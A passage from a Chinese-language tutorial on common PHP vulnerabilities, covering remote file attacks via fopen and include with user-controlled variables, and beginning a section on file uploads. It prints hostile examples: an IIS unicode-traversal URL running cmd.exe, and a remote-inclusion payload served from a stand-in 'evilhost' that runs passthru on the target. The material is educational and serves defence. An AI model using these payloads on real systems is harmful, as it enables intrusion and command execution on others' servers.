ILES数组（比较新的PHP才提供），则完全是用户用来提交变量的一种可选方式。用户的一个请求可以很容易的把变量存在这四个数组中，因此一个安全的PHP程序应该检查这四个数组。

　　如何通过远程文件进行攻击？

　　PHP是一种具有丰富特性的语言，提供了大量的函数，使编程者很容易实现特定功能。但是从安全的角度来看，功能越多，要保证它的安全性就越难，远程文件就佐证这个问题的一个很好例子：

＜?php
if (!($fd = fopen("$filename", "r"))
echo("Could not open file: $filename＜BR＞\n");
?＞

　　上面的脚本试图打开文件"$filename"，如果失败就显示错误信息。很明显，如果我们能够指定"$filename"的话，就能利用这个脚本浏览系统中的任何文件。但是，这个脚本还存在一个不太明显的特性，那就是它可以从任何其它WEB或FTP站点读取文件。实际上，PHP的大多数文件处理函数对远程文件的处理是透明的。

　　例如：

　　如果指定"$filename"为 "http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir"

　　则上面的代码实际上是利用主机target上的unicode漏洞，执行了dir命令。这使得支持远程文件的include()，require()，include_once()和require_once()在上下文环境中变得更有趣。这些函数主要功能是包含指定文件的内容，并且把它们按照PHP代码解释，主要是用在库文件上。

　　例如：

＜?php
include($libdir . "/languages.php");
?＞

　　上例中"$libdir"一般是一个在执行代码前已经设置好的路径，如果攻击者能够使得"$libdir"没有被设置的话，那么他就可以改变这个路径。但是攻击者并不能做任何事情，因为他们只能在他们指定的路径中访问文件languages.php（perl中的"Poisonnull byte"攻击对PHP没有作用）。但是由于有了对远程文件的支持，攻击者就可以做任何事情。例如，攻击者可以在某台服务器上放一个文件languages.php，包含如下内容：

＜?php
passthru("/bin/ls /etc");
?＞

　　然后把"$libdir"设置为"http://＜evilhost＞/"，这样我们就可以在目标主机上执行上面的攻击代码，"/etc"目录的内容将作为结果返回到客户的浏览器中。

　　需要注意的是，攻击代码是不会在自身所在的服务器（也就是evilhost）上执行执行自身PHP程序的，否则，攻击代码会攻击自身所在的服务器，而不是在目标服务器执行。

　　如何通过文件上载进行攻击？

　　PHP自动支持基于RFC 1867的文件上载，我们看下面的例子：

＜FORM METHOD="POST" ENCTYPE="multipart/form-data"＞
＜INPUT TYPE="FILE" NAME="hello"＞
＜INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240"＞
＜INPUT TYPE="SUBMIT"＞
＜/FORM＞

上一页  [1] [2] [3] [4] [5] [6] [7] 下一页

在google里搜索更多PHP程序的常见漏洞攻击分析

	Web www.51ec.org

上一篇信息学院： PHP.MVC的模板标签系统之模板标签库

下一篇信息学院： 解析xml文档的一个简单php类